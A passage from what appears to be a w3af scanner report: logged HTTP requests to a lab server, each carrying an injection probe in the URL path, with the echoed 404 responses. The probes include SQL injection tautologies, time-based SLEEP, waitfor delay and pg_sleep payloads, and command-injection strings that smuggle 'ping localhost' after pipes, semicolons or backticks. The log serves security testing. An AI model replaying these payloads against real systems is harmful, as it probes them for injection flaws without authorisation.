                    <status>GET http://10.12.68.43:31337/3%22+AND+%223%22%3D%224 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 3%22+AND+%223%22%3D%224 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='3%22+AND+%223%22%3D%224'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="714">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="721">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="722">
                <http-request>
                    <status>GET http://10.12.68.43:31337/87%22+OR+%2287%22%3D%2287 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 87%22+OR+%2287%22%3D%2287 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='87%22+OR+%2287%22%3D%2287'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="728">
                <http-request>
                    <status>GET http://10.12.68.43:31337/87%22+AND+%2287%22%3D%2288 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 87%22+AND+%2287%22%3D%2288 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='87%22+AND+%2287%22%3D%2288'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="732">
                <http-request>
                    <status>GET http://10.12.68.43:31337/3%27+OR+%273%27%3D%273 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 3%27+OR+%273%27%3D%273 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='3%27+OR+%273%27%3D%273'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="736">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="737">
                <http-request>
                    <status>GET http://10.12.68.43:31337/3%27+AND+%273%27%3D%274 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 3%27+AND+%273%27%3D%274 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='3%27+AND+%273%27%3D%274'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="739">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="748">
                <http-request>
                    <status>GET http://10.12.68.43:31337/55%27+OR+%2755%27%3D%2755 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 55%27+OR+%2755%27%3D%2755 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='55%27+OR+%2755%27%3D%2755'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="752">
                <http-request>
                    <status>GET http://10.12.68.43:31337/55%27+AND+%2755%27%3D%2756 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 55%27+AND+%2755%27%3D%2756 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='55%27+AND+%2755%27%3D%2756'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="755">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="757">
                <http-request>
                    <status>GET http://10.12.68.43:31337/3+OR+3%3D3+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 3+OR+3%3D3+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='3+OR+3%3D3+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="758">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="761">
                <http-request>
                    <status>GET http://10.12.68.43:31337/3+AND+3%3D4+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 3+AND+3%3D4+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='3+AND+3%3D4+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="769">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="770">
                <http-request>
                    <status>GET http://10.12.68.43:31337/20+OR+20%3D20+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 20+OR+20%3D20+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='20+OR+20%3D20+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="774">
                <http-request>
                    <status>GET http://10.12.68.43:31337/20+AND+20%3D21+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 20+AND+20%3D21+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='20+AND+20%3D21+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="776">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="785">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="792">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+SLEEP%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+SLEEP%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="800">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="809">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+SLEEP%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+SLEEP%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="817">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-n+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-n+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="824">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+SLEEP%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+SLEEP%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="833">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-c+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-c+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="839">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+pg_sleep%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+pg_sleep%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="852">
                <http-request>
                    <status>GET http://10.12.68.43:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about run+ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='run+ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="855">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
